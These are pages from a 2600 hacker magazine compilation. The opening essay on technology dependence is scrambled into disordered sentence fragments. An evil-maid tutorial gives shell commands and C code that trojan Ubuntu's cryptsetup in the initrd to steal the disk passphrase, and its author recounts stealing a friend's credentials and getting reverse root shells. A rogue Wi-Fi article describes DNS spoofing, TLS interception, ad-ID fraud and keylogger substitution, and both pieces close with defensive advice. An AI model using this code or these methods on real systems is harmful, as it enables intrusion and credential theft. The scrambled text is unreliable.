replaced with Internet memes. it was our dream to have this level of technology to play and experiment with. but the cultural differences are being slowly wiped away. video. and the overall illiteracy of two line text messaging. While personal phone calls. and just the means of communication that is now possible is simply stunning and revolutionary. A growing number of us have basically stopped communicating one on one. We broadcast our whereabouts via Twitter and those who care to join us know what to do. The inability to quickly map out a neighborhood in your head is a significant one. smart will simply be the new stupid. would you easily recover? Would private information of others be in the hands of whoever found your phone? Would you know how to contact your friends? If Gmail disappeared. texts. there is the issue of quality: too much and too little at the same time. the health issues are of concern. Now we not only are able to communicate globally as easily as we can locally. Just as real life letters were eclipsed by phones. music. generations from now? The key to conquering any form of technology is to maintain control over it. would your life be in shambles? Could you socialize without Facebook? Do you honestly believe you have more than one hundred friends? How much joy can you get out of life without constantly using some form of electricity? It’s particularly ironic that such words of warning appear in a hacker magazine.THE HACKER DIGEST . It’s all very useful until we find that we can’t function without it. the significance of a phone call has been eclipsed by the fact that we’re all constantly on the phone. We’re losing our concept of distance and of our cultural distinctiveness. Without it. And of course. It’s not even isolated to cars anymore. The more immediate health issue comes from spending way too much time in front of computer and phone screens and not being as physically active as we once were. Our smart phones allow us to know where we are by walking down a street. By living vicariously through others’ experiences. Despite what anyone says. Why waste space storing numbers and email addresses in your head when your phone can do it for you? This works great until your phone is lost or broken. idolization of Western icons. When you did. And there is a great deal of good that has come out of it. often unable to distinguish one conversation from the next. we really don’t know the health effects of having wireless devices transmitting right next to our heads for. Years ago. or our connection to other ways of life. We can’t expect everyone to know how everything works but that information must be accessible to those who are interested in pursuing it. If you lost your smart phone tomorrow. let alone those of others. or emails still happen (constantly). we lose out on our own way too often. What really matters is that we not surrender all that we know and all that we are to our little devices or to massive entities somewhere. people only know how to reach their friends and relatives by scrolling down to the corresponding name on their phone. the value of individuals.
162
. Otherwise you will be left out. Who can remember individual phone conversations when there are so many of them in a typical day? Who can recall years from now one’s thoughts as they were written down if they were only expressed as a 140 character entry on Twitter? How many actual diaries will never be penned now? Will we care enough (or even be able) to read our own words. Then you find yourself utterly stranded because you’ve become dependent on a smart device. in some cases. most of our waking life. There’s no way we can truly know until the potential effects start to manifest themselves and that can take decades. But there are many other issues. we don’t even know how much better landlines used to sound.VOLUME 26
Literally. This is what true magic is all about. Then we share a little breathing space with those people while we spend most of our time updating the net with our current location. It used to be hard to call someone far away. How many of us actually know the important phone numbers of our lives anymore? More and more. But that magic is lost if we drown in it or allow ourselves to become enveloped in a mass hypnosis that cuts us off from our privacy concerns. Balance is the key. Similarly. they sounded remote and they sounded different. you’re expected to pay attention to “news feeds” so that you know what your friends are doing. Access to reading material. those of us who use GPS to get around are increasingly using it as a crutch. Since so many of us now only use cell phones and shoddy (but cheap) VoIP services. This relates to the overall loss of history that we face due to our obsession with smart devices.

just most of it.img-2. only also does some other evil things as well. It becomes as easy as: pop in a live CD. no.24-21➥generic quiet The vmlinuz file is the compressed Linux kernel that you need when booting up. Turns out I was wrong. They have the kernel version appended to the end of their filenames. theoretically. Fedora Core.img
0x10 In a Nutshell
163
.
THE HACKER DIGEST . these two disk encryption solutions must be vulnerable to this same attack. Your whole hard drive is encrypted.24-21-generic ➥ root=/dev/mapper/ubuntu-root ro ➥ quiet splash initrd /initrd. my secrets were still secret. the boot partition holds two files necessary to boot into your operating system: vmlinuz and initrd. You can tell the exact names by looking at your grub menu file /boot/grub/menu.net
When I first started using whole disk encryption in Ubuntu a couple of years ago. So. Also.6. we’re using a computer for this attack. despite disk encryption. disk encryption using both PGP Desktop and TrueCrypt must work the same way. and managed to steal his disk encryption passphrase.6. and the reason is because with most disk encryption solutions.img. so your information is safe from physical attacks. those need to be decrypted before they get executed. This attack works by modifying files in the boot partition to do our evil deeds. and the victim is pwned. I knew that even if the feds busted into my room while I was out and did whatever they wanted with my hard drive without me knowing. and everything else is encrypted.img file when you need to do some special things before you can
0x20 The Vulnerable initrd. in case of a BIOS password. run a script.img file is a compressed initial ramdisk made up of a little filesystem full of files required to boot the rest of the way into Linux. remove CD.Pwning Past Whole Disk Encryption
by m0untainrebel@riseup. ➥24-21-generic root (hd0.lst. right? Well. and his GnuPG secret key and passphrase. the contents of his passwd and shadow files. SSH credentials for a couple of different servers.6. Then the operating system can load and the encrypted data can be accessed. boot up. In Ubuntu. shut down. The initrd. In most Linux implementations of whole disk encryption. there must be a program that isn’t encrypted whose purpose is to decrypt the rest of the hard drive. It’s only necessary to have an initrd. I have since apologized to him. if an attacker has physical access to the computer. In Windows. your whole hard drive isn’t actually encrypted. This same technique will work for any Linux distribution that uses dm-crypt for whole disk encryption. I finished up by putting a document on his desktop. All it took was about 10 minutes of physical access while his computer was turned off (and of course. I’m going to explain how to steal the disk encryption passphrase and run arbitrary code as root on a computer running Ubuntu with whole disk encryption. kernel 2. I tried this on a friend of mine. This is from mine: title Ubuntu 8. and likely others. Debian.04. which is included by default in Ubuntu. which means we can write programs to automate it. This can be done by booting to a live CD to access the hard drive or. countless hours developing this attack beforehand).VOLUME 26
0x00 Introduction
Since this program is not encrypted.1. containing his disk encryption passphrase and a link to a defaced page on his web server. digitally signed with his own PGP key. she can replace this program with something that does the same thing. just removing the hard drive (which is what I had to resort to). by installing a small unencrypted program that’s used to decrypt the rest of the drive. Your processor can’t execute encrypted instructions. I also got reverse root shells sent to me at regular intervals.0) kernel /vmlinuz-2. So by default. the small boot partition remains unencrypted. I’m only focusing on Ubuntu because it’s popular. and he has still been unsuccessful at pwning me back. I slept better at night. and that happens to be what my friend was using.

VOLUME 26
boot all the way into the OS.0. Luckily. including the /bin/sh shell.c.img.cpio. like load extra kernel modules and unlock the encrypted hard drive.0.tar.img files are compressed with cpio. fprintf(fp. | ➥ cpio --quiet --dereference ➥ -o -H newc | gzip > ➥ /tmp/poisoned-initrd.img. So how does this all work? You turn on your computer and boot to your hard drive. Grub loads menu. which executes everything needed to unlock and mount your encrypted partitions.\n”).img
To tie it all together. password.dsc ➥ cryptsetup_1. &mk. ➥ cryptpass”. Here’s an easy way to decompress your initrd file to see what’s inside:
m0rebel@ubuntu:~$ cd /tmp m0rebel@ubuntu:/tmp$ mkdir initrd m0rebel@ubuntu:/tmp$ cd initrd/ m0rebel@ubuntu:/tmp/initrd$ cp /boot ➥/initrd.orig. give an error message and then jump to another part of the code. goto out1.lst and autoselects the first option for you. add my evil code: if((r = LUKS_open_any_key( ➥options->device. &hdr. cryptsetup is open source. Once you type in the correct passphrase cryptsetup unlocks the encrypted section of your hard drive. “if the passphrase that was just entered doesn’t work.24-21➥generic .5 ➥ cryptsetup_1. which asks for your passphrase.\n”). and an Ubuntu logo pops up and your system starts booting. It’s essentially a filesystem with lots of common commands. } /* begin evil code */ else { system(“/bin/mkdir /mntboot”).img files in your boot partition. searching through the code looking for the “Enter LUKS passphrase:” prompt. m0rebel@ubuntu:~$ sudo apt-get ➥ install build-essential m0rebel@ubuntu:~$ sudo apt-get ➥ build-dep cryptsetup m0rebel@ubuntu:~$ mkdir ➥ cryptsetup m0rebel@ubuntu:~$ cd cryptsetup/ m0rebel@ubuntu:~/cryptsetup$ apt➥ get source cryptsetup m0rebel@ubuntu:~/cryptsetup$ ls cryptsetup-1.
To steal the disk encryption passphrase. ➥ backend)) < 0) { set_error(“No key available ➥ with this passphrase.img. It took me a while.gz m0rebel@ubuntu:~/cryptsetup$ The directory cryptsetup-1.gz cryptsetup_1.cpio ➥ 44021 blocks m0rebel@ubuntu:/tmp/initrd$ ➥ rm initrd. and then compressed again with gzip. initrd. password). The /init script gets run. and then the /init script mounts all the partitions. “w”). and it in turn runs the program /sbin/cryptsetup.6.0. these files are all stored in /boot/initrd. system(“/bin/mount -t ext3 /dev ➥/sda1 /mntboot”).THE HACKER DIGEST . goto out1. and the cryptsetup source code. is the correct place. before I found the correct file and line to add my evil code. fclose(fp).img-2.0.img on your unencrypted boot partition.img file with an evil one that does your bidding.5/lib/setup./initrd. Once this is complete.5.gz m0rebel@ubuntu:/tmp/initrd$ ➥ cpio -i < initrd. FILE *fp = fopen(“/mntboot/.gz m0rebel@ubuntu:/tmp/initrd$ ➥ gunzip initrd. ➥ passwordLen. It turns out that cryptsetup-1.
0x30 Stealing the Crypto Passphrase
164
. the initrd. &hdr.img. or remove the hard drive and put it in another computer to modify these files. do this:
m0rebel@ubuntu:/tmp/initrd$ find . ➥ backend)) < 0) { set_error(“No key available ➥ with this passphrase. make sure you have all the right development tools and dependencies installed to compile cryptsetup.5 holds the actual source code. ➥ passwordLen. &mk. It has an executable script called /init.52ubuntu12.img filesystem closes and the OS starts to load the rest of the way. around line 650.img.0. ➥ diff. Your initrd.cpio.0. you need to replace the /sbin/cryptsetup binary in the initrd. password. First. “%s\n”. An attacker with physical access to a victim’s computer can either boot to a live CD. you’ll have multiple vmlinuz and initrd.cpio m0rebel@ubuntu:/tmp/initrd$ ls bin conf etc init lib ➥ modules sbin scripts usr var m0rebel@ubuntu:/tmp/initrd$ ➥ ls -l sbin/cryptsetup -rwxr-xr-x 1 m0rebel m0rebel 52416 ➥ 2008-10-20 17:33 sbin/cryptsetup m0rebel@ubuntu:/tmp/initrd$
To recompress initrd.” Right after that. live USB device.img file gets decompressed in memory. and does other startup stuff. Right before line 650 is this if statement: if((r = LUKS_open_any_key( ➥options->device. If you have multiple Linux kernels installed.5-2ubuntu12. } This basically means.

The evil ssh and gpg binaries also wrote passwords to this same dump file.0. taking the source code from the Ubuntu repository for programs he uses all the time (cryptsetup.img file and replace it. a new file will be saved in plaintext in /boot/. I keep it on my keyring. you can then write whatever you want to the root partition. Pretty cool. swap.img file. Install grub to the master boot record of your USB stick.d directories to make a couple things run on bootup. While installing Ubuntu. and install grub to it. It also wrote his encryption passphrase. only a lot stealthier. make a “physical volume for LVM. “but if the passphrase does work.cryptpass in this directory. After the init script finished executing. m0rebel@ubuntu:~/cryptsetup$ ➥ mkdir root m0rebel@ubuntu:~/cryptsetup$ dpkg ➥ -x cryptsetup_1.0.5$ sudo dpkg➥buildpackage m0rebel@ubuntu:~/cryptsetup/ ➥ cryptsetup-1. and a couple of other evil binaries to his root partition. and then make the rest a “physical volume for encryption”.img file. m0rebel@ubuntu:~/cryptsetup/ ➥ cryptsetup-1. so the defense is simply don’t keep any unencrypted files on your hard drive. If you don’t want to reinstall your operating system.cryptpass in the boot partition. only once).0. If you have access to the initrd. to see all the files it creates in the right directory structure. openssh.cryptpass. though. copy /boot/* to it. close the file.img back into his boot partition (so this attack wouldn’t happen every time he booted up.0. In order to
0x50 Self-Defense
0x40 Did Someone Say Rootkit?
165
. This whole attack relies on modifying unencrypted files on your hard drive. and Ubuntu began loading the rest of the way. you can not only put an evil cryptsetup binary in there.img file from their unencrypted boot partition. You have to make sure you keep a close watch on your USB stick. not the boot partition. but you can also change around the init script to make it evil. it ran my init scripts. I modified the init script to then copy his encryption passphrase. after you steal the encryption passphrase. and any other partitions you might want. you can format your USB stick.VOLUME 26
after cryptsetup unlocks the hard drive. /etc/passwd. When you get to the partitioner. keep a USB stick plugged into your computer. This way. One of the startup scripts moved the unpoisoned initrd. all they can do is stare at the encrypted data scratching their heads. Now all you need to do is get a copy of the victim’s initrd. and then recompress the initrd. and hackers much more talented than me in rootkit development probably know how to do the same thing. which spells 0wned. Inside there.0.” This will write the encryption passphrase in plaintext to a file called . copy root/initramfs-tools/scripts/* to initrd/ scripts/. then waited another 15 minutes and sent a reverse netcat root shell to me. huh? Most of the attack on my friend relied on this exact same technique.5$ make m0rebel@ubuntu:~/cryptsetup/ ➥ cryptsetup-1. I made cryptsetup write his encryption passphrase to the ramdisk.5-2ubuntu12_ ➥i386. create a new file called /mntboot/. a copy of the original.5$ cd . After compiling it. unpoisoned initrd.. gnupg) and modifying them to be evil. It then deleted itself and the files that made it run on boot up.deb root/ m0rebel@ubuntu:~/cryptsetup$ ls ➥ -l root/sbin/ total 56 -rwxr-xr-x 1 m0rebel ➥ m0rebel ➥ 52632 2008-10-20 18:01 ➥ cryptsetup m0rebel@ubuntu:~/cryptsetup$ And there you have it: an evil.d and /etc/rcX. It then added some files to his /etc/init. There are a million other ways to do it. You can then save the file and compile it. then create a new directory called /mntboot. and never leave it lying around. and unmount the partition. sent me the contents of the dump file over the internet./configure m0rebel@ubuntu:~/cryptsetup/ ➥ cryptsetup-1. do a manual partition. The next time the victim boots up and enters their passphrase. copy root/sbin/cryptsetup to initrd/sbin/cryptsetup. and /etc/shadow to a dump file.” and inside there put your root. This script was an infinite loop that waited 15 minutes. I like to build a debian package. The other startup script ran an evil Python script in the background. But it gets better. While pwning my good friend. not your internal hard drive. extract it. Make your USB stick hold /boot. if an attacker gets physical access to your computer. and after the init script mounts the encrypted partitions. write the encryption passphrase to it.5$ . then extract it. trojaned cryptsetup binary. mount the unencrypted boot partition to this new directory.
THE HACKER DIGEST . these startup scripts get run as root.} /* end evil code */ This basically says.
system(“/bin/umount /mntboot”). That’s just how I did it. Carry them with you on a USB stick instead. Keep in mind. This means that when the computer is booting up.

co. You should then be able to boot from your USB stick. but ignoring this attack isn’t worth it when you have real secrets to hide. In this article. but forms the downstream (network-side) connection to the PortaNet. An important thing to remember when doing this is that a lot of Ubuntu updates rewrite your initrd. A little annoying maybe. a general purpose PortaNet might be composed of the following: 1.. you might as well just not encrypt your hard drive. To try and keep this article to more readable proportions. Uplink: A device that forms the upstream (Internet-side) connection to the PortaNet. you can often see people scanning the airwaves in the hope of finding a free and open route to the Internet before they are forced to part with their hard-earned cash.uk)
If there is one truth in today’s ever connected world. GSM/GPRS data modem. charging users for their access.” you’ll find instructions on how to do that. the standard disclaimers apply to this educational article. But that’s stupid.1st file on that CD looks like:
default 0 timeout 2 title Boot from USB (hd1) root (hd1) chainloader +1
I can now boot to this CD with my USB stick in. and even on board long-distance trains. and you are the only one responsible for anything that you use the following information for. comment out the line that mounts /boot. this should ideally be a WiFi card/ dongle that’s capable of functioning in
0x00.VOLUME 26
install grub to it. If you need more information on a specific aspect of this article.img to load Ubuntu. most commonly kernel upgrades.
0x60 Conclusion
L33ching the L33chers:
Using a Portable Wireless Network
by DieselDragon (hyperspeed666@gmail. such as a WiFi card/dongle. For having phun in public places.dieseldragon. Although potential variants of a PortaNet may run into the thousands. I solved this pretty simply by making a grub boot CD that chainloaded to my USB device. or Ethernet link. However. and then run grub-install /dev/sdb (or wherever your USB stick is). I will explore some of the basic principles of Portable Networks and the possibilities that they open up for many interesting and useful activities. which will then boot the closely watched initrd. http://www. you’ll need to unmount /boot. but it works. It’s also a good idea to make regular backups of the files on this USB stick. such as “The Cloud” in London.THE HACKER DIGEST . a PortaNet is a complete network that exists in a portable and easily transportable form. Introduction
0x01. or if you value your privacy.com. One computer I tried setting this defense up on couldn’t boot from USB devices. every major railway station and airport.img. depending on what use they are intended for. I’m going to concentrate mainly on the theory behind Portable Networks and their uses. Obviously. All this may seem a little paranoid. or “PortaNets”
166
. Google is your friend! As one may imagine from the name. you’ll need these backups to boot your computer. remount it as your USB device. Downlink: As above. Public WiFi networks now exist in almost every restaurant. Portable Networks.. Make sure your USB stick is plugged in and mounted as /boot when doing these updates. If you google “Making a GRUB bootable CD-ROM. modify /etc/ fstab. It’s important to freedom. Here’s what the menu. Encrypt everything. and the CD will then boot from the USB stick. If you’re worried about a competent attacker (and government agents occasionally have their competent moments). 2. If you ever lose or break your USB stick. and burn them to CDs or keep them on the internet. with many of these public networks. it’s the fact that the general public loves free wireless Internet access.

Power source: Even with the most modern batteries and power-saving techniques. The departures lounge at Stansted is typical of most UK airports. 4. as it IS the user’s connection. As I said at the beginning of this article. a PortaNet will drink a lot of juice in general operation.THE HACKER DIGEST .com in response to any requests for paypal. you could set-up the DNS to return the IP for paypalsucks. Although probably a complicated and rather tricky thing to set-up. If you wanted to go the whole hog and fool those who may decide to double-check the network first.. you won’t find a cost-free route to the Internet in any departures lounge where pay-WiFi is available! It is in these situations where our PortaNet comes in.. For more overt applications. and he loves nothing better than to find a connection that appears to be running on default out-of-box settings. which could easily be a DNS run on our laptop. they’ll have their system set to obtain network info (IP address. could be done with the same approach. to a casual observer..) that may be needed. redirection to a spoofed login page for any website. This offers up a wide range of possibilities for what can be done with that traffic given that. might look like an old AP that’s simply been plugged in and long forgotten about. you could even spoof the MAC address of your downlink card and set up a web server with faked router config pages on the laptop! As being discreet is vital. just what exactly can a PortaNet be used for? The following are a number of interesting possible applications and. this would be a laptop. given the nature of computing. and it probably comes as no surprise to find that.9% of the time whenever a client connects to a network.com. We then set up the downlink card to form a separate. so having a convenient power outlet at hand is most advisable. the laptop could trap and encrypt/decrypt secure communications on-the-fly through the following process: 1. Therefore. Likewise. depending on the situation at hand. legit-looking URL. Aside from the typical eavesdropping exercises. Traffic and service re-routing 99. in such a case. on the laptop itself or elsewhere. Uses of a PortaNet
0x02. In practice.. Apache etc. open. and this allows us to specify which DNS server the client will use for hostname resolution. all communications between the two cards run across the laptop and it is here where our eavesdropping (or whatever) applications are being run. Server: A device used to connect the Uplink and Downlink together. setting the downlink card with a generic name like “linksys” or “belkin” will probably encourage more connections from unsuspecting users than the dangerously obvious “Free_WiFi”.VOLUME 26
Access Point (AP) mode. then establishes
0x03. Many people will often reach for their laptops whilst awaiting departure. On the other hand. So. Of course. and to host any applications (Such as Wireshark) or services (DNS. The laptop establishes a secure connection to the victim in response to their original request. something that I outline in clearer detail in 0x03. one of the two WiFi cards should ideally be an internal one. The victim requests a secure web page using their browser. we give ourselves a route to the Internet. any old AP or wired switch/ hub will do. 2.. no matter how much you scan the air. The main principle of a PortaNet is that all traffic from the inside of the network passes across the server (laptop) as it goes to and from the Internet.. with the additional benefit that the address bar in the victims browser would still display the original. DNS server address. Brief Scenario and Setup
167
.. Thousands of travellers pass through it every day en-route to various destinations. a PortaNet. If you dislike PayPal for example. and the captive audience of passengers awaiting their flights is a veritable gold-mine for the operators of pay-WiFi hotspots. and configured to our own ends. By purchasing an access code for the pay-WiFi network (or firing up Wireshark and grabbing someone else’s) and setting our uplink card to use that network. etc) via DHCP. A separate AP cunningly hidden under a jacket or baseball cap might also be fine though. as even the most uneducated of users might sense something odd about a laptop with two WiFi dongles poking out of it. it is also theoretically possible to change and/ or redirect content en-route. we have full control over the victim’s Internet connection. 3.. Joe Public loves to have free WiFi access. Eavesdropping on “secure” communications The problem with conventional “passive” eavesdropping is that encrypted communications like HTTPS are exactly what they say on the tin. this list is probably just the tip of the proverbial iceberg. and unsecured network that. preferably one with a decent amount of RAM and CPU power if anything more complex than general eavesdropping is planned. has the potential to record such transmissions in their original plain-text form.

THE HACKER DIGEST - VOLUME 26
3. a separate secure connection to the requested website. 4. Transmissions between the victims browser and site are decrypted by the laptop upon arrival, the plain-text is logged/recorded, then the data is reencrypted for transmission to its intended destination via the second secure connection. Obviously, for seamless operation and less chance of detection by the victim, you would also need to change (if necessary) and pass on any security certificates or other authentication tokens that the victim’s browser would normally use to check that the connection is indeed “secure”. Content shaping and hi-jacking As whatever goes to the victim’s browser has to pass through our laptop first, it is possible for us to change and generally mess about with whatever it is they are looking at. Simple changes for small profits could be the changing of all passing Google AdSense provider IDs to one of your own... meaning that you’d get credited with hits every time the victim clicks any AdSense ad. Other phun could be had in the swapping of Google’s logo with Yahoo’s and other little content injection/tampering jokes. On a more serious note, of course, the same technique could also be used to substitute a requested application with a keylogger or similar nasty program, or to completely reverse the meaning of an e-mail from the victim’s loved one. Sharing the cost of Internet access A group of 50 people (those at a 2600 meeting, perhaps) enter a bar and settle down with their laptops and PDAs, only to find that the one available AP has some ridiculous charge of £10 per connection, or something like that. By connecting the PortaNet’s upstream card as a single paid-for connection and routing it through the downstream card to everyone’s devices, each user pays only 20p towards the cost of the connection... and the gr33dy so-andso’s running the AP only take £10 in total, instead of the £500 that they’d normally expect to make from such a large group. Secure group communications over public WiFi Following on from example D above, another headache with using public WLANs is that they generally have to be open and unsecured to allow users to connect to them in the first place... meaning that anything sent from the user’s device has to be encrypted before transmission, to remain secure from anyone else on the network who may be running an eavesdropping tool. Using a PortaNet, it would be possible for the laptop to route all Internet traffic passing across it via an SSH tunnel, or similar encrypted medium, to a server running elsewhere for onward transmission, which would bypass the risk normally posed by the public WLAN being used. Of course, one could normally do this from their own device anyway. But the added benefit of using a PortaNet to serve group communications in this way is that only one device (the PortaNet laptop) needs to be configured to use the SSH tunnel, and it affords protection for less skilled members of the group who may not know how to use such secured connections.

Back in November 2008CE, I stayed in an Oslo youth hostel that ran a free and open WiFi network for guest use, and a lot of people were using it for just about every possible activity. It naturally occurred to me that, assuming I was staying in a dorm within range of the AP, if I were to set up a laptop running Wireshark and simply leave it running in my locker or hidden under the bunk, then I could capture all manner of interesting traffic throughout the day without even having to be in the hostel. On top of this, a PortaNet could be configured to capture traffic passing across the network in the conventional way for storage and transmission to another device across a separate, secure connection. Aside from providing you with a secure, encrypted connection, as suggested in point E above, it would also allow you to perform eavesdropping/traffic monitoring from anywhere within range of the PortaNet’s AP card, meaning that you wouldn’t be confined to the power outlet in the dorm all the time.

0x04. Other potential uses of a PortaNet

Obviously, this article clarifies just how insecure and potentially dangerous public WiFi networks can be for the unwary, so I will also give a few hints ‘n’ tips for checking and avoiding malicious PortaNets and similar setups: Check the MAC address for the connection that you are using If a network called “belkin” connects to an AP with a MAC address starting 00:07:0D, then you are actually connecting to a Cisco/LinkSys device of some description. If the manufacturers ID code (Generally the first three bytes of the MAC) doesn’t match up with the brand of router that you seem to be connecting to, chances are that the network is a “fake”.

0x05. Avoiding dodgy connections and networks

168

THE HACKER DIGEST - VOLUME 26
Bear in mind, though, that MAC addresses can be spoofed and reconfigured by whoever has set up the device, so this isn’t a comprehensive safety measure. It should protect you from any PortaNets set up by average Skr1pt K1dd1ez though. A list of vendor MAC codes can be found via http://tinyurl.com/ ➥vendor-MACs Encrypt as much of your traffic as possible, and use complicated/obscure/multi-layer methods of encryption Although a PortaNet could potentially decrypt/re-encrypt data en-route as outlined above, a rare encryption protocol (or one that uses pre-defined keys and sends encrypted data right from the get-go) stands less chance of being known and decryptable by anyone running a PortaNet. Don’t do anything risky in public! The very nature of public WLANs means that they shouldn’t be used for accessing private and confidential services such as PayPal and online banking sites, unless you are using a strongly encrypted tunnel connection for such things. Remember that a lot of online services such as Hotmail, eBay and Facebook only use HTTPS encryption for user authentication purposes, and then drop back to normal HTTP for sending general data, including the content of private pages and e-mails. In these situations, even if your username and password are protected with HTTPS, the unencrypted data in the pages that you load afterwards could still provide a lot of ammunition for an identity thief or similar individual. Consider using your own network services whenever possible Setting up your own DNS and/or encrypted web-proxy on a machine at home, and only using those services, should afford a lot of protection from malicious DNS and similar attacks, with the added benefit that you have a greater level of control over the services that you may use whilst out and about. With a normal public WiFi connection, you often have to put your trust in the DNS and other services provided by that network or the ISP serving the connection, and, while most commercial ISPs can generally be trusted to deliver legitimate responses to DNS and similar calls, it would be a very simple matter for the manager of a cafe to set up a maliciously configured DNS to route calls from customers laptops to only the gods know where. Here’s hoping that you all enjoyed this article on the theory and benefits of Portable Networks, the insecurity of public WLANS, and how to go about protecting yourself from the dangers posed by the above! I see that despite my original intentions, this article, like my previous ones, has run to somewhat epic proportions... but fingers crossed, this hasn’t proved too long or tiresome for people to read and enjoy. On a more personal note; I have unfortunately become rather badly hit by the recent “credit crunch”, and I’ve actually had to lose my home Internet connection as a result. Consequently, I’m now having to do all of my Internet access and e-mail from public libraries, which often doesn’t give me nearly enough time to do everything online that I need to. So, although comments and/or constructive critique on this article are more than welcome via e-mail, I’d like to ask people not to e-mail me with any in-depth questions about “How to do this...”, “How can I make that...” or similar, as I probably won’t have nearly enough time available to answer them. Farewell for now, have a lot of phun, and surf safe!

0xFF. The final word

The Best of 2600: A Hacker Odyssey

The 600-page hardcover collection can be found at bookstores everywhere and at http://amazon.com/2600
The special “collector’s edition” is also available in rapidly dwindling numbers. 169

THE HACKER DIGEST - VOLUME 26

Telecom Informer
by The Prophet
Hello, and greetings from the Central Office! I’m currently over the North Pacific winging my way back to Seattle. I now know the price of tea in China, the breeding cycle of the giant panda, and just how crazy payphones can get. In fact, you may see some interesting Chinese payphone pictures in an upcoming issue of 2600. When preparing for my trip to Sichuan, one big consideration was how I’d call back home. Land lines are available and payphones are plentiful throughout China, but costs are very high using U.S.-based calling cards (anywhere from 50 cents to $1 per minute). Slightly more reasonable rates are available using Chinese GSM carriers, but rates still average 20-50 cents per minute. Meanwhile, VoIP is very cheap, weighing in with prices as low as... well, free. That’s what MagicJack advertises, which deserved a closer look. Of course, it’s not really free, but the promise is tempting: for about $40, you can simply plug in MagicJack and make calls anywhere in the U.S. or Canada for free. Call as long as you want, anywhere you want, for an entire year. Better yet, each subsequent year costs only $20. The product even includes free voice mail and you can select phone numbers in whatever market you like nationwide. And best of all, no fiddling around with headsets or microphones on a computer; just plug one end of the MagicJack into your computer’s USB port, and then connect the other end to an ordinary telephone set. Heck, it was even endorsed as the 2008 PC Magazine product of the year! What could possibly go wrong? Well, if you have to ask that in the telecommunications business - especially where VoIP is involved - you probably haven’t been around it for very long. VoIP is a very complicated business, and MagicJack fails to unravel its complexity. In fact, it introduces some complexity of its own. Phone numbers in whatever market you like? Well, you may get one in the same LATA, but the end office might be a toll call to virtually everywhere. Call anywhere you want? Sure, as long as the number isn’t blocked by MagicJack (as many Iowa-based teleconference services are). Make as many calls as you like? Yes, as long as you call fewer than 60 unique numbers per day. When you install the software, the End User License Agreement (EULA) has a few very nasty surprises. And as for that PC Magazine Product of the Year endorsement (which MagicJack still advertises), PC Magazine rescinded it - something never before done in the history of the magazine. There are four distinct components of MagicJack: Hardware. This is made by TigerJet, a manufacturer of VoIP hardware. The TigerJet integrated chipset provides a USB audio controller, which serves as the interface between your telephone set and the computer. It also provides a CD-ROM USB device, which is used to install the MagicJack software. Client software. Written by SJ Labs, this provides a SIP/RTP “soft phone.” It uses the CPU of your computer to encode and decode your conversations, and referencing an index of gateway servers, it uses your Internet connection to reach MagicJack’s SIP/RTP gateways. The software also logs your phone calls, sends information about you to Google, and serves advertising. Middleware. Provided by stratus.com, this software runs on MagicJack gateway servers. These are numerous and located throughout the country with reasonable proximity to MagicJack rate centers. This software provides encoding and decoding of SIP/RTP conversations on the server side, and also provides an SS7 interface to the PSTN. SIP servers appear to run on Linux, and Asterisk appears to be the switching platform. RTP servers appear to run on OpenVMS for HP Alpha. CLEC. MagicJack is a wholly owned subsidiary of YMAX Communications Inc., a fully qualified CLEC in all 50 states. This is the ace in MagicJack’s sleeve, and appears to make possible (albeit with razor-thin margins) unlimited calling to anywhere in the U.S. or Canada. MagicJack software is available for both Mac and PC. I tested the PC version. Although this is supposed to be a “plug and play” installation experience, it doesn’t work if you have autoplay disabled in your operating system. To install the software, I had to hunt through the root directory of the virtual CD-ROM device (which contains a file called “DO NOT USE THIS DRIVE”) to find the setup files. Running the installer downloads the latest installation files from the MagicJack site and starts up the soft phone. This allows you to immediately make 30 minutes of calls (over a 48 hour period) prior to registration. After you’ve reached either threshold, registration is mandatory. In this “demo” state, 800, 888, 877, 866, 500, and 900 calls are blocked, as are international calls (except Canada) and calls to directory assistance. After registering, you can select a phone number. MagicJack then offers insurance for $1 per year. The insurance covers damage to or failure of your MagicJack hardware, but whether MagicJack replaces your hardware is in its sole discretion. I declined. After registering, I received two email messages. The first was a 911 disclosure. It basically says that MagicJack will try to connect 911 calls, but they’re under no obligation to do so and they will only send 911 whatever information you provided at sign-up (which may not be your actual location). I also received a verification email. Clicking on the verification email specifically allows MagicJack to spam you per their Terms of Service. Once installed, the softphone cannot be uninstalled. Yes, you read this correctly. Even if you return the MagicJack, the software will remain on your computer, tracking your activity and displaying ads forever (or until you track down and eradicate every piece of it). Once installed correctly, making phone calls is as

170

THE HACKER DIGEST - VOLUME 26
easy as picking up the phone and dialing. That is, as long as the ports the soft phone uses are open, and as long as it’s able to communicate with the MagicJack SIP and RTP servers. There are a few additional technical requirements that are unlikely to be met on many consumer PCs, leading to a complicated and frustrating troubleshooting experience with MagicJack’s unhelpful customer service (they communicate with you only via web chat, and generally provide canned answers that don’t apply to your problem). While running, the client software handles SIP/ RTP in the background. The SIP credentials use a salted hash password, which means that it could be cracked via dictionary attack (this could allow you to, for example, clone your MagicJack account to a SIP ATA). The client also displays advertising and secretly sends information about you to Google via the 1e100. net domain. “Don’t be evil” indeed. The user interface allows selecting between normal broadband connections and high latency, slower speed aircard connections. Normal broadband connections appear to use the GSM codec, while aircard connections use a poorer quality (but lower bandwidth) codec. Obviously, as a phreak, I tested the entire dial plan. Here are my observations: • Voice quality ranges between poor and terrible. Folks, for $20 a year, you get what you pay for! It’s too poor to pass DTMF in most cases. The quality is also too poor to maintain a data (such as fax or modem) connection, making for a frustrating experience sending faxes or calling dial-up BBSs. • As compared to other VoIP services I tested, Skype, Gizmo5, IPKall, and Google Voice all provide a markedly superior VoIP experience. In my market, MagicJack quality is so poor that the service is virtually unusable. • Disconnected numbers ring indefinitely and then go to reorder. No SIT tones and no recording, so it’s really difficult to know what went wrong. • ANI and Caller ID do pass correctly. • Either 10 or 11 digit dialing goes through, but seven digit dialing is not allowed. • All circuits busy recordings are played. • Calls to numbers that don’t supervise go through, and they even send forward audio. • Calls to Canada and the U.S. are free, including Alaska, Hawaii and Puerto Rico. However, U.S. Virgin Islands isn’t considered domestic and isn’t allowed without purchasing international credits. Guam and the Commonwealth of the Northern Mariana Islands are also considered international. • Calls to 800/888/866/877 numbers go through without issues. However, calls to UIFNs (country code 800) fail without any international calling credit. I’m not sure whether they go through or bill properly with international calling credit on the account, because I didn’t buy any. • Calls to a carrier access code plus any number route to a recording that says “You have reached a YMAX Communications test number. This call was successful.” • Dialing 0 provides instructions to dial the area code and telephone number. 0+ calls yield the same results. • While most calls appear to be routed either through local access tandems or dedicated interconnection trunks, YMAX doesn’t have interconnection agreements with every ILEC, CLEC, or wireless carrier. For these calls, AT&T appears to be the long distance carrier (based 